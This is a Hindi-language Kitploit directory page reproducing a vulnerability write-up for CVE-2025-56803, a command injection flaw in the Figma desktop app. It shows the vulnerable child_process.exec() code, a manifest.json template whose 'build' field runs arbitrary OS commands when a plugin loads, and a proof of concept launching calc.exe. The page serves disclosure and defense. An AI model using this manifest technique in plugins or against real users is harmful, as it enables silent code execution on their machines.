Skip to content
KitploitKITPLOIT
उपकरणब्लॉग
जमा करें
उपकरणब्लॉग
जमा करें

हैकिंग, पेनटेस्ट और साइबर सुरक्षा उपकरण आपके सुरक्षा शस्त्रागार के लिए!

Kitploit हैकिंग, साइबर सुरक्षा और पेंटेस्टिंग टूल्स की एक निर्देशिका है। कमजोरियों को खोजने, सिस्टम का विश्लेषण करने, परीक्षण को स्वचालित करने और अपनी सुरक्षा को मजबूत करने के लिए नवीनतम प्रोजेक्ट अपडेट खोजें।

··फ़ीड·संपर्क·गोपनीयता·© 2026 Kitploit

टूल निर्देशिका

श्रेणियाँ

सभी श्रेणियाँ देखें
Loading categories
उपकरण/GitHubGitHub/yosasasutsut/cve-2025-56803
भेद्यता विश्लेषणकोड विश्लेषणशोषणवेब एप्लिकेशन शोषणपेनिट्रेशन टेस्टिंगलर्निंग और शिक्षा
GitHubyosasasutsut/cve-2025-56803

CVE-2025-56803

Figma डेस्कटॉप एप्लिकेशन में प्लगइन निष्पादन के माध्यम से OS कमांड इंजेक्शन भेद्यता

रिपॉजिटरी देखें
21 साल पहलेअभी तक समीक्षित नहीं

सबसे लोकप्रिय

सभी देखें →

हमारे समुदाय द्वारा सबसे अधिक उपयोग किए जाने वाले उपकरण खोजें।

सभी उपकरण खोजें

हमारे उपकरणों का संग्रह ब्राउज़ करें

सभी उपकरण देखें →
साझा करें

CVE-2025-56803

Figma डेस्कटॉप एप्लिकेशन में प्लगइन निष्पादन के माध्यम से OS कमांड इंजेक्शन भेद्यता

1. अवलोकन

Figma आइकन
  • एप्लिकेशन: Figma डेस्कटॉप एप्लिकेशन
  • संस्करण: 125.6.5
  • विक्रेता: Figma, Inc.
  • CWE: CWE-78: OS कमांड में प्रयुक्त विशेष तत्वों का अनुचित न्यूट्रलाइज़ेशन ('OS कमांड इंजेक्शन')
  • CVSS: 8.4
  • वेक्टर स्ट्रिंग: CVSS:3.1/AV:L/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H

2. सारांश

Figma डेस्कटॉप एप्लिकेशन (v125.6.5) में प्लगइन लोडर में एक कमांड इंजेक्शन भेद्यता है।
एक दुर्भावनापूर्ण प्लगइन मैनिफेस्ट (manifest.json) build फ़ील्ड का दुरुपयोग कर सकता है, जो बिना सत्यापन के सीधे में पास किया जाता है। यह प्लगइन लोड होते ही बिना किसी सुरक्षा चेतावनी या संकेत के मनमाना OS कमांड निष्पादन की अनुमति देता है।

child_process.exec()

3. विवरण

भेद्यता main.js में स्थित कोड से उत्पन्न होती है, जो Node.js के अंतर्निहित child_process मॉड्यूल को आयात करता है:

root@kitploit:~
Zlt = require("child_process")

बाद में, यदि किसी प्लगइन की manifest.json फ़ाइल में build फ़ील्ड मौजूद है और इसका मान एक स्ट्रिंग है, तो एप्लिकेशन बिना किसी सैनिटाइज़ेशन या सत्यापन के child_process.exec() का उपयोग करके सीधे मान को निष्पादित करता है:

root@kitploit:~
if (
  s.build &&
  typeof s.build === "string" &&
  (l.path = process.env.PATH || "",
  await new Promise((g) => {
    (0, Zlt.exec)(s.build, { cwd: i }, (y, I, P) => {
      l.stdout = I;
      l.stderr = P;
      y && (l.buildErrCode = y.code);
      g();
    });
  }),
  l.buildErrCode
)
  return l;

परिणामस्वरूप, एक दुर्भावनापूर्ण प्लगइन में निहित निम्नलिखित manifest.json फ़ाइल build फ़ील्ड के मान को OS कमांड के रूप में निष्पादित करने का कारण बनेगी:

root@kitploit:~
{
  "name": "<NAME>",
  "id": "<ID>",
  "api": "1.0.0",
  "main": "code.js",
  "build": "<COMMAND>",
  "capabilities": [],
  "enableProposedApi": false,
  "documentAccess": "dynamic-page",
  "editorType": [
    "figma"
  ],
  "networkAccess": {
    "allowedDomains": [
      "none"
    ]
  }
}

यह निष्पादन प्रवाह Figma के प्लगइन हैंडलिंग लॉजिक में एम्बेडेड है, और main.js में require("child_process") कॉल का शामिल होना पुष्टि करता है कि कमांड निष्पादन सीधे एप्लिकेशन के मुख्य तर्क में निर्मित है।

4. प्रूफ ऑफ कॉन्सेप्ट (PoC)

निम्नलिखित दुर्भावनापूर्ण manifest.json शामिल करने वाले प्लगइन को चलाकर:

root@kitploit:~
{
  "name": "poc",
  "id": "1535549154235958412",
  "api": "1.0.0",
  "main": "code.js",
  "build": "calc.exe",
  "capabilities": [],
  "enableProposedApi": false,
  "documentAccess": "dynamic-page",
  "editorType": [
    "figma"
  ],
  "networkAccess": {
    "allowedDomains": [
      "none"
    ]
  }
}

एक बार यह प्लगइन Figma में पंजीकृत और निष्पादित हो जाने पर, निर्दिष्ट OS कमांड (calc.exe) तुरंत चलता है।

https://github.com/user-attachments/assets/48e0a47a-0d1c-4a92-b9ff-33e9559fd5e7

5. अनुशंसाएँ

यद्यपि build फ़ील्ड का निष्पादन Figma डेस्कटॉप एप्लिकेशन में आधिकारिक रूप से समर्थित सुविधा है, फिर भी एप्लिकेशन को जहाँ संभव हो, manifest.json में उपयोगकर्ता-नियंत्रित फ़ील्ड जैसे build पर निर्भर रहने से बचना चाहिए।
यदि ऐसे फ़ील्ड को समर्थित किया जाना आवश्यक है, तो कमांड इंजेक्शन को रोकने के लिए उन्हें सख्त इनपुट सत्यापन से गुजरना होगा।
इसके अतिरिक्त, Node.js के child_process.exec() के उपयोग से बचा जाना चाहिए, और इसके बजाय स्पष्ट तर्क हैंडलिंग वाले सुरक्षित विकल्प अपनाए जाने चाहिए।

6. संदर्भ

  • https://www.cve.org/CVERecord?id=CVE-2025-56803
  • https://nvd.nist.gov/vuln/detail/CVE-2025-56803
  • https://www.figma.com/plugin-docs/manifest/
टूल डाउनलोड करें